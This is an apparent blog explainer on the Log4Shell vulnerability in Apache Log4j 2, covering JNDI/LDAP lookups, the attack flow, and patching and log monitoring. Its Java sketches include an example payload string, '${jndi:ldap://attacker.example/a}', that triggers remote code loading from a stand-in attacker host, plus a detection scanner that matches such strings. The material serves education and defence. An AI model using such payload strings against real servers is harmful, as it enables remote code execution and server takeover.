Log4j Vulnerability - A Basic Guide

Log4j is not a codename for a super virus. Log4j is simply the name of a piece of open-source code: a logging library written in the Java programming language. Some have characterized the Log4j vulnerability (CVE-2021-44228) as “the single biggest, most critical vulnerability of the last decade”.

Personally, I can understand all the drama behind this because Log4j is very different from “ordinary” cybersecurity vulnerabilities. The key difference is that Log4j is not a single software program that contains a vulnerability but a component that is built into many different software products used by organizations. So it is not one product that is vulnerable but the component itself. This means that every piece of software that contains this component (and there is a lot of it out there) is vulnerable. Installed software is easy to track, but a component built into many different products is something completely different.

In this post I will explain the basics about Log4j and why (in my opinion) the “buzz” that has been created in the cybersecurity community around Log4j is completely justified. To be completely clear, the actual vulnerability is called Log4Shell. Log4Shell is a software vulnerability in Apache Log4j 2, a popular Java library for logging messages in applications. I will stick to Log4j for general descriptions about how Log4j works and I will use Log4Shell when I talk about the actual vulnerability.

What is Log4j?

To fully understand why Log4j is an extremely serious cybersecurity threat, you need to understand how the development of modern software works and especially the programming language Java.

Let’s take building an e-commerce application as an example. You choose Java as the programming language for this application. Because a lot of pre-written code is already available, you don’t want to start completely from scratch and code everything yourself, from the payment gateway to the user interface to the shopping cart. Instead, you use components that other Java developers have already written and integrate them into your application for the functionality you need: you don’t have to reinvent the wheel when it already exists. These pieces of pre-written code are called libraries. In Java they are usually packaged as “.jar” files, and Log4j is distributed as such a .jar file.

Log4j is a piece of pre-written Java code that gives an application a specific kind of logging functionality. For a programmer, this is very helpful. The basic purpose of Log4j is to log events of interest. This type of logging is a good debugging technique. A programmer, for example, can log all exceptions to find out quickly what is wrong with a specific type of code. This is a great help in the debugging process (removing programming issues) in case the code gives errors/doesn’t work. Analyzing the log file helps the programmer to identify even the most elusive bugs.
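To make the idea of logging exceptions a bit more concrete, here is a minimal sketch. It uses java.util.logging from the standard Java library as a stand-in so that it runs without extra downloads; Log4j's own API looks different. The class name, the logger name "shop.cart" and the parseQuantity helper are made up for this illustration.

```java
import java.util.logging.Level;
import java.util.logging.Logger;

// Illustrative only: java.util.logging stands in for Log4j here.
final class ExceptionLoggingSketch {

    // Hypothetical logger name; any name works.
    static final Logger LOG = Logger.getLogger("shop.cart");

    // Parses a quantity typed by a user; logs the exception if the text is not a number.
    static int parseQuantity(String text) {
        try {
            return Integer.parseInt(text.trim());
        } catch (NumberFormatException e) {
            // Passing the exception along keeps its stack trace in the log record.
            LOG.log(Level.WARNING, "Could not parse quantity, falling back to 1", e);
            return 1;
        }
    }

    public static void main(String[] args) {
        System.out.println(parseQuantity("3"));
        System.out.println(parseQuantity("three"));
    }
}
```

The second call does not crash the program. It leaves a warning with a stack trace in the log, which is the kind of trail a programmer follows when debugging.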

The Log4j library comes from the Apache Software Foundation, an organization that manages open-source software. The foundation also manages the Apache HTTP Server, one of the most widely used web servers, and Apache Tomcat, a popular server for Java web applications. You can find them on millions of servers all over the world.

A good example of Log4j at work is when you type or click on a bad weblink and get a 404 error message. The web server running the domain of the web link you tried to get to, tells you that there’s no such webpage. It also records that event in a log for the server’s system administrators using Log4j.
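The 404 example can be sketched in a few lines. This is a toy model with no real networking, and it again uses java.util.logging as a stand-in for Log4j; the page list, the logger name and the handle method are assumptions made for the illustration.

```java
import java.util.Map;
import java.util.logging.Logger;

// Illustrative only: a toy "web server" without networking.
final class NotFoundLoggingSketch {

    // Hypothetical logger name.
    static final Logger LOG = Logger.getLogger("web.access");

    // Hypothetical site content: path -> page body.
    static final Map<String, String> PAGES = Map.of(
            "/", "Welcome",
            "/cart", "Your shopping cart");

    // Returns the HTTP status code for a request and logs misses for the administrators.
    static int handle(String path) {
        if (PAGES.containsKey(path)) {
            return 200;
        }
        // The requested path is chosen by the visitor, so visitor-supplied text ends up in the log.
        LOG.warning("404 Not Found: " + path);
        return 404;
    }

    public static void main(String[] args) {
        System.out.println(handle("/cart"));
        System.out.println(handle("/no-such-page"));
    }
}
```

Note the comment inside handle: the text that gets logged comes straight from the visitor. That detail matters for the vulnerability.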

A similar kind of diagnostic logging is used throughout software applications. In the online game Minecraft, the server uses Log4j to log activity such as total memory used and user commands typed into the console. Now imagine someone typing a string of code into the Minecraft chat and immediately gaining access to the Minecraft server. That is exactly what happened! After patches were applied this was no longer possible, but it shows the seriousness of Log4Shell: the vulnerability in Log4j that surfaced these past weeks.

Where exactly is the vulnerability?

The Log4Shell vulnerability is not on the client-side but on the server-side. A client is a machine or a program that requests services through the web while a server is a machine or a program that provides services to the clients according to the client’s requests.

To fully grasp this I will use the World Wide Web as an example. The World Wide Web (WWW) allows computers and other devices to communicate with each other. The devices in the network need various services, including data and other resources. The WWW works according to the client-server model: the devices or programs that request services are called clients, and the devices that provide those services are called servers.

If you go to amazon.com with your favorite browser (for instance Chrome) to do some shopping, the browser on your machine is the client. The information that appears on your screen while you shop is retrieved from the server on which it is stored. In short: attacks by hackers using the Log4Shell vulnerability are not aimed at the user (you behind your workstation) but at the server that stores the information you retrieve. So the server is the patient in this story. And boy: this patient is seriously ill if it has the Log4Shell vulnerability.

Maybe you sigh in relief now, but don’t relax just yet. If a hacker runs arbitrary code on an affected server, there are plenty of follow-up options that can also hurt you as a client/user.

How do hackers use the vulnerability?

Remember the client-server model? Popular websites receive a lot of clients all day long.

Different types of information are logged for those clients at different times, depending on what information they need. Sometimes the date is registered but other times it can, for instance, be the time, username, profile, etc. This information is stored in different places. Think of a “date” database, a “time” database, a “username” database, a “profile” database, etc. To manage all this data in an orderly way, an “LDAP server” is often used. LDAP stands for Lightweight Directory Access Protocol. LDAP is a cross-platform, vendor-neutral protocol for querying and maintaining directory services, and it is often used for authentication. You can see an LDAP server as a very detailed virtual phone book that gives you access to an extensive directory of contact information for hundreds of people. LDAP makes it easy to search through the phone book and find whatever information is needed.

Now JNDI comes into play. JNDI stands for Java Naming and Directory Interface. JNDI provides a standard Application Programming Interface (API) for interacting with naming and directory services, together with a service provider interface (SPI) through which the individual services are plugged in. JNDI gives Java applications and objects a powerful and transparent interface to access directory services like LDAP.

As we saw, Log4j runs inside the application and logs the events that occur in it, and the application can reach directory services such as an LDAP server through JNDI. Log4j itself also has a JNDI feature: it can look up data through JNDI when it finds a special expression in a message it is asked to log. Because of this feature, the Log4Shell vulnerability is possible. This brings us to the next question: How is this vulnerability exploited?

The attack starts when a hacker gets a special string of characters into the log of an application that has the Log4Shell vulnerability, for example by typing it into a form field or a chat window. The strings that are required for this are not complicated and are easy to obtain: a few minutes of Googling is enough to find one. This means that the vulnerability is extremely easy to exploit, even for people who hardly know anything about hacking. After the string has been logged, Log4j hands the address in it to JNDI, which contacts the server of the hacker. The hacker’s server then sends back a malformed or non-standard response that points to malicious Java code. This response travels back through Log4j into the application, which loads and runs the code. When that happens, it’s “party-time” for the hacker because there is now free access to the vulnerable server: a “backdoor” has been created. Below is a figure that shows the full process that the hacker will follow. The Swiss CERT (GovCERT.ch) published it in a very good blog post (a bit technical though) about Log4j. You can read more about the details in that post.

The log4j JNDI Attack schematically explained
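The core of the problem, a logger that acts on special expressions inside the text it is asked to log, can be imitated with a harmless toy model. The sketch below is not Log4j code and makes no network connection: it only records which address a vulnerable logger would have contacted. The class and method names and the address attacker.example are invented for the illustration.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Toy model only: this is NOT Log4j code and performs no network access.
final class LookupExpansionSketch {

    // Matches simple ${prefix:value} expressions (no nesting).
    private static final Pattern LOOKUP = Pattern.compile("\\$\\{([a-z]+):([^}]*)\\}");

    // Addresses a real JNDI lookup would have contacted.
    static final List<String> contacted = new ArrayList<>();

    // Expands lookups in a message, roughly the way a lookup-enabled logger might.
    static String expand(String message) {
        Matcher m = LOOKUP.matcher(message);
        StringBuilder out = new StringBuilder();
        while (m.find()) {
            String prefix = m.group(1);
            String value = m.group(2);
            String replacement;
            if (prefix.equals("jndi")) {
                // A vulnerable logger would fetch (and possibly run) whatever this address returns.
                contacted.add(value);
                replacement = "<object loaded from " + value + ">";
            } else {
                replacement = m.group(); // leave other lookups untouched
            }
            m.appendReplacement(out, Matcher.quoteReplacement(replacement));
        }
        m.appendTail(out);
        return out.toString();
    }

    public static void main(String[] args) {
        // Hypothetical attacker-controlled text, e.g. a chat message or a form field.
        String userInput = "${jndi:ldap://attacker.example/a}";
        System.out.println(expand("User said: " + userInput));
        System.out.println("Would have contacted: " + contacted);
    }
}
```

The point of the sketch is that the application never meant to contact anybody. It only wanted to write down what a user typed, and the typed text itself decided which server got contacted.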

The most serious thing a hacker can achieve is RCE. RCE stands for remote code execution. RCE gives an attacker the ability to run code of their choice on someone else’s computing device, no matter where the device is located. In other words, a hacker can subvert the server so that it serves malware to visitors of the websites that are hosted on it. So indirectly it can also compromise your workstation as a user by infecting your own system with malware. Still, the chance that a single individual will be attacked is very small. The expectation is that mainly big companies will be hit because this is far more profitable.

Once hackers have RCE, many follow-up attacks are possible, such as installing ransomware or deploying crypto-miners.

How to protect yourself and your organization?

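Organizations that use Log4j 2 in their own applications and infrastructure should update them immediately. The same applies to third-party applications. Version 2.17.0 closes the Log4Shell vulnerability and the related issues that were found shortly after it. Later releases contain further security fixes (2.17.1 fixes CVE-2021-44832), so update to the most recent version available.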
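As a rough first check, you can compare the version in the name of a Log4j .jar file against the 2.17.0 release mentioned above. The sketch below assumes the usual file naming log4j-core-<version>.jar; the class and method names are made up. It is not an official tool: it misses copies of Log4j that are bundled inside other .jar files and it does not cover the older Log4j 1.x line.

```java
import java.util.Optional;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Illustrative helper, not an official tool: checks versions found in .jar file names.
final class Log4jVersionSketch {

    // The release used as the baseline in this post.
    static final String BASELINE = "2.17.0";

    // Assumes the usual naming scheme log4j-core-<version>.jar.
    private static final Pattern CORE_JAR =
            Pattern.compile("^log4j-core-(\\d+(?:\\.\\d+)*).*\\.jar$");

    // Extracts the numeric version from a file name, if the name matches the scheme.
    static Optional<String> versionFromJarName(String fileName) {
        Matcher m = CORE_JAR.matcher(fileName);
        return m.matches() ? Optional.of(m.group(1)) : Optional.empty();
    }

    // Turns "2.14.1" into {2, 14, 1}; missing or non-numeric parts count as 0.
    static int[] parse(String version) {
        int[] parts = new int[3];
        String[] tokens = version.split("[.\\-]");
        for (int i = 0; i < parts.length && i < tokens.length; i++) {
            if (!tokens[i].matches("\\d+")) {
                break; // stop at suffixes such as "beta9"
            }
            parts[i] = Integer.parseInt(tokens[i]);
        }
        return parts;
    }

    // Returns true if the given version is older than the baseline.
    static boolean isOlderThanBaseline(String version) {
        int[] a = parse(version);
        int[] b = parse(BASELINE);
        for (int i = 0; i < a.length; i++) {
            if (a[i] != b[i]) {
                return a[i] < b[i];
            }
        }
        return false;
    }

    public static void main(String[] args) {
        String[] names = {"log4j-core-2.14.1.jar", "log4j-core-2.17.0.jar", "commons-io-2.11.0.jar"};
        for (String name : names) {
            versionFromJarName(name).ifPresent(v -> System.out.println(
                    name + " -> " + (isOlderThanBaseline(v) ? "update needed" : "at or above baseline")));
        }
    }
}
```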

Because Log4Shell affects so many systems and is so easy to exploit, an organization must act swiftly to protect all its systems. To quickly identify affected systems, organizations need a solution like GitLab that can immediately and automatically identify vulnerable systems and their dependencies, and help an organization to prioritize the most critical systems to update first, especially on code running in production.

As Log4Shell continues to threaten companies’ applications and sensitive data, GitLab enables organizations to gain real-time insight into which assets the vulnerability affects at run-time, and which of these assets are the highest priority, while also monitoring the whole multi-cloud environment. This helps you maintain real-time awareness of malicious activity as you address the impact of the Log4Shell vulnerability.

In addition to that, organizations should keep monitoring their systems for suspicious traffic. Most hackers don’t strike immediately but only after a while, when organizations start to lower their guard. They may have set up a backdoor by using the vulnerability before the organization applied a patch.
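One simple form of monitoring is to search existing log files for the tell-tale start of a lookup string. The sketch below is a first pass only, with invented sample lines and names: it catches the plain form and one URL-encoded form, while attackers are known to disguise the string (for example with nested lookups), so an empty result proves nothing.

```java
import java.util.List;
import java.util.Locale;
import java.util.stream.Collectors;

// Illustrative first-pass scan; disguised variants of the string will slip through.
final class JndiLogScanSketch {

    // Returns the lines that contain the most obvious forms of a JNDI lookup string.
    static List<String> suspiciousLines(List<String> logLines) {
        return logLines.stream()
                .filter(JndiLogScanSketch::looksSuspicious)
                .collect(Collectors.toList());
    }

    static boolean looksSuspicious(String line) {
        String lower = line.toLowerCase(Locale.ROOT);
        return lower.contains("${jndi:")          // plain form
                || lower.contains("%24%7bjndi:"); // "${" URL-encoded as %24%7B
    }

    public static void main(String[] args) {
        // Hypothetical log lines made up for this example.
        List<String> lines = List.of(
                "GET /cart 200 agent=Mozilla/5.0",
                "GET / 200 agent=${jndi:ldap://attacker.example/a}",
                "GET /search?q=%24%7Bjndi:ldap://attacker.example/a%7D 404");
        suspiciousLines(lines).forEach(System.out::println);
    }
}
```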

As a private user, you can protect yourself against the secondary attacks explained earlier by installing a good antivirus program and keeping it updated. Stay alert for phishing scams, use a password manager, and run your internet traffic through a Virtual Private Network (VPN).

Final thoughts

I think we will hear much more about organizations that are attacked because of the Log4Shell vulnerability in the next few years because of the following reasons:

It is very easy to use the Log4Shell vulnerability: as we saw, you don’t need to be a top hacker with an expensive set of gear to use the vulnerability and it can be used at any time;
Because of the scale (millions of servers are affected), it is expected that many vulnerable servers are overlooked and that after some time system admins more or less forget about the vulnerability, which means attacks can happen for many years to come. In addition to that, it is very unrealistic to assume that all the millions of affected servers that are out there will be patched and properly monitored. On top of that, many organizations won’t even realize that they have systems at risk;
A lot of backdoors might have been created by hackers in the past. The fact that the Log4Shell vulnerability was officially reported on November 24th, 2021 by Chen Zhaojun from Alibaba’s Cloud Security Team doesn’t mean that it was unknown to everyone in the hacking community before that date. That the vulnerability only now went “viral” is no indication that hackers did not use it to compromise servers earlier;
Over time, new information and with it new vulnerabilities can come to light: most of the time the rabbit hole is far deeper than you think, so this problem is not going to be completely solved for a long time. Be prepared to hear about more incidents related to the Log4Shell vulnerability in the coming years.

My experience on this subject is pretty basic so feel free to give me additional advice/insights by contacting me. If you want to keep in the loop when I upload a new post, don’t forget to subscribe to receive a notification by e-mail.
